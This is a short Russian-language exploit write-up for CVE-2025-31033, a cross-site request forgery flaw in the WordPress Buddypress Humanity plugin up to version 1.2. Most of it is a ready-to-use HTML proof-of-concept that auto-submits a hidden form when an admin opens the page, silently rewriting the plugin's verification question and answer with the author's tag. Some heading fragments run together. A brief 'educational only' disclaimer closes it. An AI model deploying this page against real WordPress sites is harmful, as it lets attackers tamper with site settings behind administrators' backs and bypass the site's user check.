
WordPress Buddypress Humanity Plugin <= 1.2 уязвим к межсайтовой подделке запросов (CSRF)
Плагин Buddypress Humanity для WordPress (версия <= 1.2) уязвим к Межсайтовой подделке запросов (CSRF).
Эта уязвимость позволяет злоумышленнику заставить привилегированного пользователя (например, администратора) незаметно изменить настройки плагина (такие как контрольный вопрос и ответ), обходя логику проверки пользователя.
bph-settings (только для администратора)CVE-2025-31033При успешной эксплуатации эта уязвимость позволяет атакующим:
buddypress-humanity<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Exploit – CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
<form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
<input type="hidden" name="bph_option[bph_title]" value="Nxploited">
<input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
<input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
<input type="hidden" name="bph_submit" value="1">
</form>
</body>
</html>
☠️ Как только эта страница открывается аутентифицированным администратором, она незаметно изменяет настройки плагина.
Это доказательство концепции предназначено только для образовательных целей.
Используйте ответственно и не тестируйте на системах, которые вам не принадлежат.
Автор не несет ответственности за любое неправильное использование или причиненный ущерб.
Nxploited | Khaled Alenazi